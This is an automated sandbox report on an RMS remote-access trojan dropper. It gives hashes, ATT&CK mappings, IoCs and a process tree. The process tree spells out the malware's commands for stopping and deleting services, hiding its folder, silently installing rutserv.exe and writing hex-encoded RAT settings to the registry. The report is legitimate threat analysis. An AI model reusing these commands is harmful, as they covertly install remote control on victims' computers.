rms | 7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8

Analysis

max time kernel
146s
max time network
162s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 03:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe
Size

4.1MB
MD5

141b7122a1d414677e11e8c702aee431
SHA1

dee8fb536fb3f386e536a0326f8c9e786c4f5dae
SHA256

7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8
SHA512

e554a8afbc85be16a7452285c7b9feeec115a23f302c69ccfdae6070d907fa16841b7706d22a7fbce2af150d426f5b037d53c4d74aaf26b872e828a37880c32e
SSDEEP

98304:M1wrPDPnWKw6ki4JNHrotxdJP2jTqmuX3O2HChZy7hN:M1Iu5cUpoXdJuSmyOXo77

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 8 IoCs

pid	Process
728	data.exe
1028	rutserv.exe
1744	rutserv.exe
1724	rutserv.exe
1748	rutserv.exe
1220	rfusclient.exe
2044	rfusclient.exe
1368	rfusclient.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
1044	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000013aad-76.dat	upx
behavioral1/files/0x0006000000015c88-110.dat	upx
behavioral1/files/0x0006000000015c88-111.dat	upx
behavioral1/files/0x0006000000015c88-113.dat	upx
behavioral1/files/0x0006000000015c88-116.dat	upx
behavioral1/files/0x0006000000015c88-118.dat	upx
behavioral1/memory/2044-121-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral1/memory/1220-122-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral1/files/0x0006000000015c88-123.dat	upx
behavioral1/files/0x0006000000015c88-125.dat	upx
behavioral1/memory/1368-128-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral1/memory/2044-131-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx
behavioral1/memory/1220-132-0x0000000000400000-0x0000000000AE6000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
1676	cmd.exe

Loads dropped DLL 7 IoCs

pid	Process
1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe
1936	cmd.exe
1936	cmd.exe
1936	cmd.exe
1748	rutserv.exe
1748	rutserv.exe
1220	rfusclient.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00090000000135a6-58.dat	autoit_exe
behavioral1/files/0x00090000000135a6-60.dat	autoit_exe
behavioral1/files/0x00090000000135a6-63.dat	autoit_exe
behavioral1/files/0x00080000000139e4-75.dat	autoit_exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\spom\lpksetup-20220812-142942-0.log	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-143927-0.log	cmd.exe
File opened for modification	C:\Windows\spom\ASPNETSetup_00001.log	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\data.exe	cmd.exe
File opened for modification	C:\Windows\spom\jawshtml.html	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File opened for modification	C:\Windows\spom	attrib.exe
File opened for modification	C:\Windows\spom\837955eb-4438-4798-87c9-ed55efd843d5.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI651D.txt	cmd.exe
File created	C:\Windows\spom\java_install_reg.log	cmd.exe
File created	C:\Windows\spom\RGI456A.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\d049a70a-7cbc-489d-bf6e-38c35d97ec42.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\dd_wcf_CA_smci_20220812_141121_966.txt	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\webmvorbisencoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\ose00000.exe	cmd.exe
File opened for modification	C:\Windows\spom\rfusclient.exe	cmd.exe
File opened for modification	C:\Windows\spom\rutserv.exe	cmd.exe
File opened for modification	C:\Windows\spom\baa94390-0a16-4381-a16a-06472ed9ab0d.tmp	cmd.exe
File created	C:\Windows\spom\d4af2d21-0b27-4517-9ef3-3dad21234baf.tmp	cmd.exe
File opened for modification	C:\Windows\spom\db39c21f-c2fb-4a8a-bffc-ab2297870976.tmp	cmd.exe
File created	C:\Windows\spom\dd_SetupUtility.txt	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-143612-0.log	cmd.exe
File opened for modification	C:\Windows\spom\vp8decoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\vp8encoder.dll	cmd.exe
File opened for modification	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\d4af2d21-0b27-4517-9ef3-3dad21234baf.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI64AB.txt	cmd.exe
File opened for modification	C:\Windows\spom\dd_wcf_CA_smci_20220812_141121_966.txt	cmd.exe
File opened for modification	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_141101732-MSI_netfx_Full_x64.msi.txt	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-142942-0.log	cmd.exe
File opened for modification	C:\Windows\spom\nouac.cmd	cmd.exe
File created	C:\Windows\spom\RGI456A.tmp-tmp	cmd.exe
File created	C:\Windows\spom\837955eb-4438-4798-87c9-ed55efd843d5.tmp	cmd.exe
File created	C:\Windows\spom\9aadf372-3cd4-4dab-ac45-7005197649cd.tmp	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00000.log	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI64AB.txt	cmd.exe
File opened for modification	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\vp8decoder.dll	cmd.exe
File created	C:\Windows\spom\ASPNETSetup_00001.log	cmd.exe
File created	C:\Windows\spom\hide.exe	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File opened for modification	C:\Windows\spom\lpksetup-20220812-142623-0.log	cmd.exe
File opened for modification	C:\Windows\spom\lpksetup-20220812-143246-0.log	cmd.exe
File opened for modification	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\vp8encoder.dll	cmd.exe
File created	C:\Windows\spom\Admin.bmp	cmd.exe
File opened for modification	C:\Windows\spom\d049a70a-7cbc-489d-bf6e-38c35d97ec42.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI651D.txt	cmd.exe
File opened for modification	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\SetupExe(20220812141903A70).log	cmd.exe
File opened for modification	C:\Windows\spom\9aadf372-3cd4-4dab-ac45-7005197649cd.tmp	cmd.exe
File created	C:\Windows\spom\baa94390-0a16-4381-a16a-06472ed9ab0d.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI64AB.txt	cmd.exe
File created	C:\Windows\spom\lpksetup-20220812-143246-0.log	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_141101732.html	cmd.exe
File created	C:\Windows\spom\e069afc2-fed2-4478-8247-dee1c3b0b641.tmp	cmd.exe
File opened for modification	C:\Windows\spom\java_install.log	cmd.exe
File opened for modification	C:\Windows\spom\58b0d689-15f6-4e51-81a0-3f6ac6e3ee9a.tmp	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
752	sc.exe
1616	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1028	rutserv.exe
1028	rutserv.exe
1028	rutserv.exe
1028	rutserv.exe
1744	rutserv.exe
1744	rutserv.exe
1724	rutserv.exe
1724	rutserv.exe
1748	rutserv.exe
1748	rutserv.exe
1748	rutserv.exe
1748	rutserv.exe
1220	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1368	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	rutserv.exe
Token: SeDebugPrivilege	1724	rutserv.exe
Token: SeTakeOwnershipPrivilege	1748	rutserv.exe
Token: SeTcbPrivilege	1748	rutserv.exe
Token: SeTcbPrivilege	1748	rutserv.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
728	data.exe
728	data.exe
728	data.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
728	data.exe
728	data.exe
728	data.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1028	rutserv.exe
1744	rutserv.exe
1724	rutserv.exe
1748	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1344 wrote to memory of 728	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	26
PID 1344 wrote to memory of 728	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	26
PID 1344 wrote to memory of 728	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	26
PID 1344 wrote to memory of 728	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	26
PID 1344 wrote to memory of 1676	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	27
PID 1344 wrote to memory of 1676	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	27
PID 1344 wrote to memory of 1676	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	27
PID 1344 wrote to memory of 1676	1344	7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe	27
PID 728 wrote to memory of 1936	728	data.exe	29
PID 728 wrote to memory of 1936	728	data.exe	29
PID 728 wrote to memory of 1936	728	data.exe	29
PID 728 wrote to memory of 1936	728	data.exe	29
PID 1936 wrote to memory of 980	1936	cmd.exe	31
PID 1936 wrote to memory of 980	1936	cmd.exe	31
PID 1936 wrote to memory of 980	1936	cmd.exe	31
PID 1936 wrote to memory of 980	1936	cmd.exe	31
PID 980 wrote to memory of 936	980	net.exe	32
PID 980 wrote to memory of 936	980	net.exe	32
PID 980 wrote to memory of 936	980	net.exe	32
PID 980 wrote to memory of 936	980	net.exe	32
PID 1936 wrote to memory of 1532	1936	cmd.exe	33
PID 1936 wrote to memory of 1532	1936	cmd.exe	33
PID 1936 wrote to memory of 1532	1936	cmd.exe	33
PID 1936 wrote to memory of 1532	1936	cmd.exe	33
PID 1532 wrote to memory of 1124	1532	net.exe	34
PID 1532 wrote to memory of 1124	1532	net.exe	34
PID 1532 wrote to memory of 1124	1532	net.exe	34
PID 1532 wrote to memory of 1124	1532	net.exe	34
PID 1936 wrote to memory of 752	1936	cmd.exe	35
PID 1936 wrote to memory of 752	1936	cmd.exe	35
PID 1936 wrote to memory of 752	1936	cmd.exe	35
PID 1936 wrote to memory of 752	1936	cmd.exe	35
PID 1936 wrote to memory of 1616	1936	cmd.exe	36
PID 1936 wrote to memory of 1616	1936	cmd.exe	36
PID 1936 wrote to memory of 1616	1936	cmd.exe	36
PID 1936 wrote to memory of 1616	1936	cmd.exe	36
PID 1936 wrote to memory of 1632	1936	cmd.exe	37
PID 1936 wrote to memory of 1632	1936	cmd.exe	37
PID 1936 wrote to memory of 1632	1936	cmd.exe	37
PID 1936 wrote to memory of 1632	1936	cmd.exe	37
PID 1936 wrote to memory of 1044	1936	cmd.exe	38
PID 1936 wrote to memory of 1044	1936	cmd.exe	38
PID 1936 wrote to memory of 1044	1936	cmd.exe	38
PID 1936 wrote to memory of 1044	1936	cmd.exe	38
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1028	1936	cmd.exe	39
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1744	1936	cmd.exe	40
PID 1936 wrote to memory of 1408	1936	cmd.exe	41
PID 1936 wrote to memory of 1408	1936	cmd.exe	41
PID 1936 wrote to memory of 1408	1936	cmd.exe	41
PID 1936 wrote to memory of 1408	1936	cmd.exe	41
PID 1936 wrote to memory of 1412	1936	cmd.exe	42
PID 1936 wrote to memory of 1412	1936	cmd.exe	42

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1044	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe
"C:\Users\Admin\AppData\Local\Temp\7435105aec655a494f65351ce4e8d55d9db5c20bd27a003dd8c694d71abf08b8.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1344
- C:\Users\Admin\AppData\Local\Temp\data.exe
  "C:\Users\Admin\AppData\Local\Temp\data.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:728
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c nouac.cmd
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\SysWOW64\net.exe
      net stop netaservice
      4⤵
      Suspicious use of WriteProcessMemory
      PID:980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop netaservice
        5⤵
        
        PID:936
  - - C:\Windows\SysWOW64\net.exe
      net stop rmanservice
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        5⤵
        
        PID:1124
  - - C:\Windows\SysWOW64\sc.exe
      sc delete netaservice
      4⤵
      Launches sc.exe
      PID:752
  - - C:\Windows\SysWOW64\sc.exe
      sc delete rmanservice
      4⤵
      Launches sc.exe
      PID:1616
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h "C:\Windows\spom"
      4⤵
      Sets file to hidden
      Drops file in Windows directory
      Views/modifies file attributes
      PID:1044
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /silentinstall
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1028
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /firewall
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:1744
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c00750074007500730031004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00380031004500330030003000390033002d0039003100350032002d0034004100300032002d0039003500380044002d003400320042004200380043004100440039004200320043007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
      4⤵
      PID:1412
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
      4⤵
      PID:572
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
      4⤵
      PID:584
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
      4⤵
      PID:1540
  - - C:\Windows\spom\rutserv.exe
      "rutserv.exe" /start
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
  2⤵
  - Deletes itself
  PID:1676

C:\Windows\spom\rutserv.exe
C:\Windows\spom\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1748
- C:\Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1220
- - C:\Windows\spom\rfusclient.exe
    C:\Windows\spom\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1368
- C:\Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:2044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

Filesize
300B

MD5
f0bcf24d001128730c3733424d8da2ea

SHA1
04f611967e6c3380cd2d9783b39ea64e6ffe1de1

SHA256
4f95ba73a6e484e8bd5fb777cc5cc60da4c62270a73d79ec55f5f802e665b10b

SHA512
ad927901f861835ecf6a36c919e05c82b5e93ebeb599ceeab8fccffc15909f67b2b9c8f338131bbf35769bf16a1aaeb6b194a6c66a1fb789d36fdbfa62284ee0

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe

Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe

Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
C:\Users\Admin\AppData\Local\Temp\hide.exe

Filesize
819KB

MD5
72cc4ab6ee23c79bbeed4c4d7b31f741

SHA1
a5598acb794ebbbad6c0819c20f6f7ed99541e89

SHA256
5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73

SHA512
4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nouac.cmd

Filesize
10KB

MD5
2a0f50d2843dc39924eba8e561d635cb

SHA1
050f7e0edb476dc1c9760a75e114100c2b04c560

SHA256
3745091ce52393dbbb7d0eeab2ef8a6c8554226366c8da3e2aa4305275fb8b91

SHA512
fa4f30ad81864c8ff8a90918fc979a2dea85e8a51690622a6ae76f5a47640cabac2382e0340e402f2d30f93a52ce1213ffb764835e5fc0179164f8d24870c540

Download Submit
